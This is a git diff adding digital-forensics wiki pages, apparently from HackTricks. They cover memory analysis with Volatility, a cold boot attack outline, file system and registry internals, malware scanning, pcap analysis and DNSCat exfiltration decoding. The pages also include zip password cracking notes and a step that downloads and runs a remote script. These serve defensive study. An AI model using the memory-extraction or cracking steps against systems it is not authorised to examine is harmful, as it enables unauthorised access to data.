+ vol.py -f PATH\_IMAGE pslist —&gt; Procesos pslist no supera los rootkits pero psscan algunos sí
+
+ vol.py -f PATH\_IMAGE psscan —&gt; Comparar esta salida y la anterior para buscar rootkits
+
+ vol.py -f PATH\_IMAGE connscan —&gt; Conexiones, a partir de windows Vista se usa netscan
+
+ vol.py -f PATH\_IMAGE printkey -K “Microsoft\Windows NT\CurrentVersion\Winlogon” —&gt; procesos que escribieron en dicho registro
+
+**Cold Boot Attack:**
+
+En el caso en el que el sistema esté cifrado y encendido pero no se tenga la contraseña para entrar se realiza este tipo de ataque.
+
+Este ataque se basa en la posibilidad de que el delincuente ya accediese antes al sistema y se desloggeara, de forma que la contraseña del cifrado aún pudiese estar en memoria pero no se puede hacer un dump de la memoria pues no se puede loggear uno como el usuario pues no se tiene la contraseña.
+
+El ataque cold boot consiste en que la memoria RAM no se elimina en cuanto se apaga el ordenador y si se le aplica frío puede durar varios minutos, de esta forma para intentar extraerla:
+
+ 1\) Hacer que la BIOS inicie desde usb
+
+ 2\) Conectar el USB especial \(scraper.bin\) que hace un copiado de la memoria
+
+ 3\) El USB ha copiado la memoria
+
+**High speed forensics imagers**
+
+Logicube’s Forensic Falcon —&gt; 30GB por minuto
+
+Mediaclone’s Superimager —&gt; de 29 a 31 GB por minuto
+
+En Windows un Block es llamado Cluster. En este sistema operativo cuando un cluster no se llena el espacio vacio se queda sin usar, lo cual es util pues puede contener datos eliminados. En linux la parte que no se llena de un block se rellena con ceros.
+
+Windows filesystems: FAT12, FAT16, FAT32, exFAT, NTFS4, NTFS5 y ReFS
+
+Un sistema de ficheros FAT comienza con un BOOT RECORD seguido de una ALLOCATION TABLE, depués el ROOT DIRECTORY y finalmente el DATA AREA, el tamaño de un cluster es de 512B
+
+ BOOT SECTOR:
+
+ Primer setor de FAT12 o FAT16, o 3 primeros sectores de FAT32, define el volumen, el offset de las otras 3 áreas y contiene el boot program si es booteable
+
+ FAT \(File Allocation Table\):
+
+ Es una tabla donde buscar qué cluster va a continuacion. Para localizar un archivo basta con saber la dirección del primer cluster y luego usando la FAT se localiza lo demás. FAT32 usa 32 bits para la dirección del cluster. Una dirección en la tabla guarda la dirección del siguiente cluster. Un cluster es el ultimo estara relleno de unos y si no se usa, de ceros. Un cluster malo tiene hex FFF7.
+
+ WINDOWS ROOT DIRECTORY:
+
+ Un directorio contiene info del nombre y la extension, entry type, la dirección del primer cluster, the lens of the file y data time \(contiene toda esta info en 32bits\)
+
+Cuando se elimina un archivo se cambia el primer byte del nombre por 0xE5 y se desalojan los clusters la ta tabla FAT.
+
+Quick format: Pone a cero las entradas de root directory y file allocation table entries, pero deja los datos sin tocar.
+
+**NTFS**
+
+El tamaño de un cluster es de 64kB, aunque se pueden crear clusters mas pequeños o más grandes. 64bits para la dirección de cada cluster
+
+ BOOT RECORD:
+
+ Puede usar hasta 16 sectores, tiene el cluster size, dirección de MFT\(master file table\), el mirror de MFT\(4 primeras entradas\) y el código si es booteable.
+
+ MASTER FILE TABLE \(se puede ver con EnCase\)
+
+ Su nombre comienza con $ y se crea cuando el NTFS es formateado. Cada archivo usa uno o mas MFT records para guardar info: $file record head\(MFT nº, link count, tipo de archivo, tamaño, etc\), $standard information, $filename, $data y $attribute.
+
+ Si el metadata de un archivo es mayor que un MFT record, se usan mas.
+
+ El primer archivo es $MFT
+
+ $BITMAP guarda el estado de cada cluster, si está usado vale 1, sino vale 0.
+
+Cuando se elimina algo, el pone el cluster a 0 \(unallocated\) la entrada de $index es eliminada el MTF padre, pero no se borran los datos.
+
+**REGSTRO**
+
+ Usuarios y contraseñas, e-mails, sitios de internet
+
+ Historial de navegación
+
+ Internet searches
+
+ Lista de archivos accedidos
+
+ Lista de programas instalados
+
+Windows guarda el registro en archivos binarios llamados hives.
+
+SAM: Información de cuentas y contraseñas asi como el SID de cada. También guarda el tiempo de LOGON
+
+SID: Identifica unequivocamente a usuarios y su grupo para dar derecho o no a archivos
+
+En system se guarda info de los usbs introducidos asi como cuando entraron y cuando se sacaron
+
+El registro se puede ver tanto en máquinas corriendo como en imagenes de memoria. Para verlos se puede usar EnCase, Registry Explore, RegRipper, Registry Recon, Access Data Registry Viewer
+
+Registros: SAM \(para cuentas\), SYSTEM \(para info del sistema\), NTUSER.dat \(cada usuario tiene el suyo que guarda info del usuario\)
+
+**CUSTOM**
+
+Cuando tienes una imagen puedes pasarle binwalk para saber qué esconde la imagen.
+
+Si tienes una copia de la MFT:
+
+ Con volatility puedes reconstruir la MFT e ir mirando todos los archivos que hay y su contenido en hex y ascii \(aunque son muchos pero está bien para buscar archivos extraños\) con: volatility -f mft.dd mftparser -N --output-file=mft.dd.vol.txt --&gt; Te da un archivo con texto cno todos los archivos que existen en dicha imagen
+
+Borrado de datos: [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
+
+recuperacion de datos: [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
+
+En imagenes:
+
+Strings  
+exiftool
+
diff --git a/forensics/basic-forensics-esp/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensics-esp/desofuscation-vbs-cscript.exe.md
new file mode 100644
index 00000000..090d4417
--- /dev/null
+++ b/forensics/basic-forensics-esp/desofuscation-vbs-cscript.exe.md
@@ -0,0 +1,49 @@
+# Desofuscation vbs \(cscript.exe\)
+
+Some things that could be useful to debug/desofuscate a malicious vbs file:
+
+### echo
+
+```text
+Wscript.Echo "Like this?"
+```
+
+### Commnets
+
+```text
+' this is a comment
+```
+
+### Test
+
+```text
+cscript.exe file.vbs
+```
+
+### Write data to a file
+
+```text
+Function writeBinary(strBinary, strPath)
+
+    Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
+
+    ' below lines pupose: checks that write access is possible!
+    Dim oTxtStream
+
+    On Error Resume Next
+    Set oTxtStream = oFSO.createTextFile(strPath)
+
+    If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
+    On Error GoTo 0
+
+    Set oTxtStream = Nothing
+    ' end check of write access
+
+    With oFSO.createTextFile(strPath)
+        .Write(strBinary)
+        .Close
+    End With
+
+End Function
+```
+
diff --git a/forensics/basic-forensics-esp/file-system-analysis.md b/forensics/basic-forensics-esp/file-system-analysis.md
new file mode 100644
index 00000000..65aa881d
--- /dev/null
+++ b/forensics/basic-forensics-esp/file-system-analysis.md
@@ -0,0 +1,21 @@
+# File System Analysis
+
+From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
+
+Occasionally, a CTF forensics challenge consists of a full disk image, and the player needs to have a strategy for finding a needle \(the flag\) in this haystack of data. Triage, in computer forensics, refers to the ability to quickly narrow down what to look at. Without a strategy, the only option is looking at everything, which is time-prohibitive \(not to mention exhausting\).
+
+Example of mounting a CD-ROM filesystem image:
+
+```text
+mkdir /mnt/challenge
+mount -t iso9660 challengefile /mnt/challenge
+```
+
+Once you have mounted the filesystem, the `tree` command is not bad for a quick look at the directory structure to see if anything sticks out to you for further analysis.
+
+You may not be looking for a file in the visible filesystem at all, but rather a hidden volume, unallocated space \(disk space that is not a part of any partition\), a deleted file, or a non-file filesystem structure like an [http://www.nirsoft.net/utils/alternate\_data\_streams.html](https://trailofbits.github.io/ctf/forensics/NTFS). For EXT3 and EXT4 filesystems, you can attempt to find deleted files with [extundelete](http://extundelete.sourceforge.net/). For everything else, there's [TestDisk](http://www.cgsecurity.org/wiki/TestDisk): recover missing partition tables, fix corrupted ones, undelete files on FAT or NTFS, etc.
+
+[The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/) and its accompanying web-based user interface, "Autopsy," is a powerful open-source toolkit for filesystem analysis. It's a bit geared toward law-enforcement tasks, but can be helpful for tasks like searching for a keyword across the entire disk image, or looking at the unallocated space.
+
+Embedded device filesystems are a unique category of their own. Made for fixed-function low-resource environments, they can be compressed, single-file, or read-only. [Squashfs](https://en.wikipedia.org/wiki/SquashFS) is one popular implementation of an embedded device filesystem. For images of embedded devices, you're better off analyzing them with [firmware-mod-kit](https://code.google.com/archive/p/firmware-mod-kit/) or [binwalk](https://github.com/devttys0/binwalk).
+
diff --git a/forensics/basic-forensics-esp/office-file-analysis.md b/forensics/basic-forensics-esp/office-file-analysis.md
new file mode 100644
index 00000000..7857e8e6
--- /dev/null
+++ b/forensics/basic-forensics-esp/office-file-analysis.md
@@ -0,0 +1,59 @@
+# Office file analysis
+
+From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
+
+Microsoft has created dozens of office document file formats, many of which are popular for the distribution of phishing attacks and malware because of their ability to include macros \(VBA scripts\). Microsoft Office document forensic analysis is not too different from PDF document forensics, and just as relevant to real-world incident response.
+
+Broadly speaking, there are two generations of Office file format: the OLE formats \(file extensions like RTF, DOC, XLS, PPT\), and the "Office Open XML" formats \(file extensions that include DOCX, XLSX, PPTX\). Both formats are structured, compound file binary formats that enable Linked or Embedded content \(Objects\). OOXML files are actually zip file containers \(see the section above on archive files\), meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document:
+
+```text
+$ unzip example.docx 
+Archive:  example.docx
+  inflating: [Content_Types].xml     
+  inflating: _rels/.rels             
+  inflating: word/_rels/document.xml.rels  
+  inflating: word/document.xml       
+  inflating: word/theme/theme1.xml   
+ extracting: docProps/thumbnail.jpeg  
+  inflating: word/comments.xml       
+  inflating: word/settings.xml       
+  inflating: word/fontTable.xml      
+  inflating: word/styles.xml         
+  inflating: word/stylesWithEffects.xml  
+  inflating: docProps/app.xml        
+  inflating: docProps/core.xml       
+  inflating: word/webSettings.xml    
+  inflating: word/numbering.xml
+$ tree
+.
+├── [Content_Types].xml
+├── _rels
+├── docProps
+│   ├── app.xml
+│   ├── core.xml
+│   └── thumbnail.jpeg
+└── word
+    ├── _rels
+    │   └── document.xml.rels
+    ├── comments.xml
+    ├── document.xml
+    ├── fontTable.xml
+    ├── numbering.xml
+    ├── settings.xml
+    ├── styles.xml
+    ├── stylesWithEffects.xml
+    ├── theme
+    │   └── theme1.xml
+    └── webSettings.xml
+```
+
+As you can see, some of the structure is created by the file and folder hierarchy. The rest is specified inside the XML files. [_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%253A10.1007%252F978-3-642-23300-5_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5_27&token2=exp=1497911340~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5_27*~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d) details some ideas for data hiding techniques, but CTF challenge authors will always be coming up with new ones.
+
+Once again, a Python toolset exists for the examination and analysis of OLE and OOXML documents: [oletools](http://www.decalage.info/python/oletools). For OOXML documents in particular, [OfficeDissector](https://www.officedissector.com/) is a very powerful analysis framework \(and Python library\). The latter includes a [quick guide to its usage](https://github.com/grierforensics/officedissector/blob/master/doc/html/_sources/txt/ANALYZING_OOXML.txt).
+
+Sometimes the challenge is not to find hidden static data, but to analyze a VBA macro to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is [typically just used as a jumping-off platform to bootstrap code execution](https://www.lastline.com/labsblog/party-like-its-1999-comeback-of-vba-malware-downloaders-part-3/). In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don't need to own a license to Microsoft Office to debug this. You can use [Libre Office](http://libreoffice.org/): [its interface](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/) will be familiar to anyone who has debugged a program; you can set breakpoints and create watch variables and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from a command line:
+
+```text
+$ soffice path/to/test.docx macro://./standard.module1.mymacro
+```
+
diff --git a/forensics/basic-forensics-esp/pdf-file-analysis.md b/forensics/basic-forensics-esp/pdf-file-analysis.md
new file mode 100644
index 00000000..aff6968f
--- /dev/null
+++ b/forensics/basic-forensics-esp/pdf-file-analysis.md
@@ -0,0 +1,24 @@
+# PDF File analysis
+
+From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
+
+PDF is an extremely complicated document file format, with enough tricks and hiding places [to write about for years](https://www.sultanik.com/pocorgtfo/). This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled "Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures." It's no longer available at its original URL, but you can [find a copy here](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf). Ange Albertini also keeps a wiki on GitHub of [PDF file format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md).
+
+The PDF format is partially plain-text, like HTML, but with many binary "objects" in the contents. Didier Stevens has written [good introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/) about the format. The binary objects can be compressed or even encrypted data, and include content in scripting languages like JavaScript or Flash. To display the structure of a PDF, you can either browse it with a text editor, or open it with a PDF-aware file-format editor like Origami.
+
+[qpdf](https://github.com/qpdf/qpdf) is one tool that can be useful for exploring a PDF and transforming or extracting information from it. Another is a framework in Ruby called [Origami](https://github.com/mobmewireless/origami-pdf).
+
+When exploring PDF content for hidden data, some of the hiding places to check include:
+
+* non-visible layers
+* Adobe's metadata format "XMP"
+* the "incremental generation" feature of PDF wherein a previous version is retained but not visible to the user
+* white text on a white background
+* text behind images
+* an image behind an overlapping image
+* non-displayed comments
+
+There are also several Python packages for working with the PDF file format, like [PeepDF](https://github.com/jesparza/peepdf), that enable you to write your own parsing scripts.
+
+
+
diff --git a/forensics/basic-forensics-esp/png-tricks.md b/forensics/basic-forensics-esp/png-tricks.md
new file mode 100644
index 00000000..1e84b518
--- /dev/null
+++ b/forensics/basic-forensics-esp/png-tricks.md
@@ -0,0 +1,6 @@
+# PNG tricks
+
+PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correcteness or attempt to repair corrupted PNGs you can use [pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)
+
+You can try to repair corrupted PNGs using online tools like: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/)
+
diff --git a/forensics/basic-forensics-esp/usb-logs-analysis.md b/forensics/basic-forensics-esp/usb-logs-analysis.md
new file mode 100644
index 00000000..2dc969e1
--- /dev/null
+++ b/forensics/basic-forensics-esp/usb-logs-analysis.md
@@ -0,0 +1,27 @@
+# USB logs analysis
+
+## USBrip
+
+ **usbrip** is a small piece of software written in pure Python 3 which parses Linux log files \(`/var/log/syslog*` or `/var/log/messages*` depending on the distro\) for constructing USB event history tables.
+
+It is interesting to know all the USBs that have been used and it will be more usefull if you have an authorized list of USB to find "violation events" \(the use of USBs that aren't inside that list\).
+
+### Installation
+
+```text
+pip3 install usbrip
+usbrip ids download #Downloal USB ID database
+```
+
+### Examples
+
+```text
+usbrip events history #Get USB history of your curent linux machine
+usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
+#Search for vid and/or pid
+usbrip ids download #Downlaod database
+usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
+```
+
+More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
+
diff --git a/forensics/basic-forensics-esp/video-and-audio-file-analysis.md b/forensics/basic-forensics-esp/video-and-audio-file-analysis.md
new file mode 100644
index 00000000..2193436d
--- /dev/null
+++ b/forensics/basic-forensics-esp/video-and-audio-file-analysis.md
@@ -0,0 +1,14 @@
+# Video and Audio file analysis
+
+From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
+
+Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the [mediainfo](https://mediaarea.net/en/MediaInfo) tool \(or `exiftool`\) and identify the content type and look at its metadata.
+
+[Audacity](http://www.audacityteam.org/) is the premiere open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectogram view \(although a specialized tool called [Sonic Visualiser](http://www.sonicvisualiser.org/) is better for this task in particular\). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one \(if you can hear garbled audio, interference, or static\). [Sox](http://sox.sourceforge.net/) is another useful command-line tool for converting and manipulating audio files.
+
+It's also common to check least-significant-bits \(LSB\) for a secret message. Most audio and video media formats use discrete \(fixed-size\) "chunks" so that they can be streamed; the LSBs of those chunks are a common place to smuggle some data without visibly affecting the file.
+
+Other times, a message might be encoded into the audio as [DTMF tones](http://dialabc.com/sound/detect/index.html) or morse code. For these, try working with [multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng) to decode them.
+
+Video file formats are really container formats, that contain separate streams of both audio and video that are multiplexed together for playback. For analyzing and manipulating video file formats, [ffmpeg](http://ffmpeg.org/) is recommended. `ffmpeg -i` gives initial analysis of the file content. It can also de-multiplex or playback the content streams. The power of ffmpeg is exposed to Python using [ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html).
+
diff --git a/forensics/basic-forensics-esp/zips-tricks.md b/forensics/basic-forensics-esp/zips-tricks.md
new file mode 100644
index 00000000..8f651721
--- /dev/null
+++ b/forensics/basic-forensics-esp/zips-tricks.md
@@ -0,0 +1,18 @@
+# ZIPs tricks
+
+There are a handful of command-line tools for zip files that will be useful to know about.
+
+* `unzip` will often output helpful information on why a zip will not decompress.
+* `zipdetails -v` will provide in-depth information on the values present in the various fields of the format.
+* `zipinfo` lists information about the zip file's contents, without extracting it.
+* `zip -F input.zip --out output.zip` and `zip -FF input.zip --out output.zip` attempt to repair a corrupted zip file.
+* [fcrackzip](https://github.com/hyc/fcrackzip) brute-force guesses a zip password \(for passwords &lt;7 characters or so\).
+
+[Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
+
+One important security-related note about password-protected zip files is that they do not encrypt the filenames and original file sizes of the compressed files they contain, unlike password-protected RAR or 7z files.
+
+Another note about zip cracking is that if you have an unencrypted/uncompressed copy of any one of the files that is compressed in the encrypted zip, you can perform a "plaintext attack" and crack the zip, as [detailed here](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files), and explained in [this paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). The newer scheme for password-protecting zip files \(with AES-256, rather than "ZipCrypto"\) does not have this weakness.
+
+From: [https://app.gitbook.com/@cpol/s/hacktricks/~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/@cpol/s/hacktricks/~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks)
+
diff --git a/forensics/malware-analysis.md b/forensics/malware-analysis.md
new file mode 100644
index 00000000..b70becc2
--- /dev/null
+++ b/forensics/malware-analysis.md
@@ -0,0 +1,66 @@
+# Malware Analysis
+
+## Forensics CheatSheets
+
+[https://www.jaiminton.com/cheatsheet/DFIR/\#](https://www.jaiminton.com/cheatsheet/DFIR/#)
+
+## Online Services
+
+* [VirusTotal](https://www.virustotal.com/gui/home/upload)
+* [HybridAnalysis](https://www.hybrid-analysis.com)
+* [Koodous](https://koodous.com/)
+* [Intezer](https://analyze.intezer.com/)
+
+## Offline antivirus
+
+* Windows Defender
+* Avast Antivirus \(or any other antivirus\)
+
+Update the Antivirus, disconnect from internet the PC and scan the file.
+
+### PEpper
+
+[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable \(binary data, entropy, URLs and IPs, some yara rules
+
+### Yara
+
+#### Install
+
+```text
+sudo apt-get install -y yara
+```
+
+#### Prepare rules
+
+Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)  
+Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
+
+```text
+wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
+mkdir rules
+python malware_yara_rules.py
+```
+
+#### Scan
+
+```text
+yara -w malware_rules.yar image  #Scan 1 file
+yara -w malware_rules.yar folder #Scan hole fodler
+```
+
+### ClamAV
+
+#### Install
+
+```text
+sudo apt-get install -y clamav
+```
+
+#### Scan
+
+```text
+sudo freshclam      #Update rules
+clamscan filepath   #Scan 1 file
+clamscan folderpath #Scan the hole folder
+```
+
diff --git a/forensics/memory-dump-analysis.md b/forensics/memory-dump-analysis.md
new file mode 100644
index 00000000..2bcacc2c
--- /dev/null
+++ b/forensics/memory-dump-analysis.md
@@ -0,0 +1,51 @@
+# Memory dump analysis
+
+Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](malware-analysis.md).
+
+## Bulk Extractor
+
+This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
+
+This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do:
+
+```text
+bulk_extractor memory.img -o out_folder
+```
+
+Navigate through **all the information** that the tool has gathered \(passwords?\), **analyze** the **packets** \(read[ **Pcaps analysis**](pcaps-analysis/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
+
+## FindAES
+
+Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
+
+Download [here](https://sourceforge.net/projects/findaes/).
+
+## [Volatility](volatility-examples.md)
+
+The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool \(or a VMware memory image gathered by pausing the VM\). So, given the memory dump file and the relevant "profile" \(the OS from which the dump was gathered\), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifact.  
+From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
+
+## Mini dump crash report
+
+When the dump is small \(just some KB, maybe a few MB\) the it's probably a mini dump crash report and not a memory dump.
+
+![](../.gitbook/assets/image%20%28305%29.png)
+
+If you hat Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
+
+![](../.gitbook/assets/image%20%28164%29.png)
+
+You can also load the exception and see the decompiled instructions
+
+![](../.gitbook/assets/image%20%282%29.png)
+
+![](../.gitbook/assets/image%20%28149%29.png)
+
+Anyway Visual Studio isn't the best tool to perform a analysis in depth of the dump.
+
+You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
+
+
+
+
+
diff --git a/forensics/pcaps-analysis/README.md b/forensics/pcaps-analysis/README.md
new file mode 100644
index 00000000..d2c68a90
--- /dev/null
+++ b/forensics/pcaps-analysis/README.md
@@ -0,0 +1,86 @@
+# Pcaps analysis
+
+Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
+
+A note about PCAP vs PCAPNG: there are two versions of the PCAP file format; PCAPNG is newer and not supported by all tools. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
+
+## Online tools for pcaps
+
+* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)\*\*\*\*
+* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com/)\*\*\*\*
+
+## Basic Statistics
+
+### Capinfos
+
+```text
+capinfos capture.pcap
+```
+
+### Wireshark
+
+Inside wireshark you can see different **statistics** that could be useful. Some interesting http filters: [https://www.wireshark.org/docs/dfref/h/http.html](https://www.wireshark.org/docs/dfref/h/http.html)
+
+If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_  
+You can add new layers to the main information bar _\(No., Time, Source...\)_ pressing _right bottom_ and _Edit Column_
+
+[Some WireShark tricks here.](wireshark-tricks.md)
+
+## Suricata
+
+### Install and setup
+
+```text
+apt-get install suricata
+apt-get install oinkmaster
+echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
+oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
+```
+
+### Check pcap
+
+```text
+suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
+```
+
+## Ngrep
+
+If you are **looking** for **something** inside the pcap you can use **ngrep**. And example using the main filters:
+
+```text
+ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
+```
+
+## Xplico Framework
+
+Xplico can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email \(POP, IMAP, and SMTP protocols\), all HTTP contents, each VoIP call \(SIP\), FTP, TFTP, and so on.
+
+### Install
+
+```text
+sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
+sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
+sudo apt-get update
+sudo apt-get install xplico
+```
+
+### Run
+
+```text
+/etc/init.d/apache2 restart
+/etc/init.d/xplico start
+```
+
+Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
+
+Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
+
+## NetworkMiner
+
+Like Xplico it is a tool to analyze and extract objects from pcaps. It has a free edition that you can download [here](https://www.netresec.com/?page=NetworkMiner).
+
+## Other pcap analysis tricks
+
+* [DNSCat pcap analysis](dnscat-exfiltration.md)
+* [USB Keyboard pcap analysis](usb-keyboard-pcap-analysis.md)
+
diff --git a/forensics/pcaps-analysis/dnscat-exfiltration.md b/forensics/pcaps-analysis/dnscat-exfiltration.md
new file mode 100644
index 00000000..6b30aa54
--- /dev/null
+++ b/forensics/pcaps-analysis/dnscat-exfiltration.md
@@ -0,0 +1,28 @@
+# DNSCat pcap analysis
+
+If you have pcap with data being **exfiltrated by DNSCat** \(without using encryption\), you can find the exfiltrated content.
+
+You only need to know that the **first 9 bytes** are not real data but are related to the **C&C communication**:
+
+```python
+from scapy.all import rdpcap, DNSQR, DNSRR
+import struct 
+
+f = ""
+last = ""
+for p in rdpcap('ch21.pcap'):
+	if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
+
+		qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
+		qry = ''.join(_.decode('hex') for _ in qry)[9:]
+		if last != qry:
+			print(qry)
+			f += qry
+		last = qry
+
+#print(f)
+```
+
+For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)  
+[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
+
diff --git a/forensics/pcaps-analysis/usb-keyboard-pcap-analysis.md b/forensics/pcaps-analysis/usb-keyboard-pcap-analysis.md
new file mode 100644
index 00000000..cc0aefa2
--- /dev/null
+++ b/forensics/pcaps-analysis/usb-keyboard-pcap-analysis.md
@@ -0,0 +1,13 @@
+# USB Keyboard pcap analysis
+
+If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection.
+
+A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
+
+It could be important to know that the data that starts with "02" is pressed using shift.
+
+You can read more information and find some scripts about how to analyse this in:
+
+* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
+* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
+
diff --git a/forensics/pcaps-analysis/wireshark-tricks.md b/forensics/pcaps-analysis/wireshark-tricks.md
new file mode 100644
index 00000000..71a595ee
--- /dev/null
+++ b/forensics/pcaps-analysis/wireshark-tricks.md
@@ -0,0 +1,27 @@
+# WireShark tricks
+
+## Decrypting TLS
+
+### Decrypting https traffic with server private key
+
+_edit&gt;preference&gt;protocol&gt;ssl&gt;_
+
+![](../../.gitbook/assets/image%20%28263%29.png)
+
+Press _Edit_ and add all the data of the server and the private key \(_IP, Port, Protocol, Key file and password_\)
+
+### Decrypting https traffic with symmetric session keys
+
+It turns out that Firefox and Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. More in: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)  
+To detect this search inside the environment for to variable `SSLKEYLOGFILE`
+
+A file of shared keys will looks like this:
+
+![](../../.gitbook/assets/image%20%2862%29.png)
+
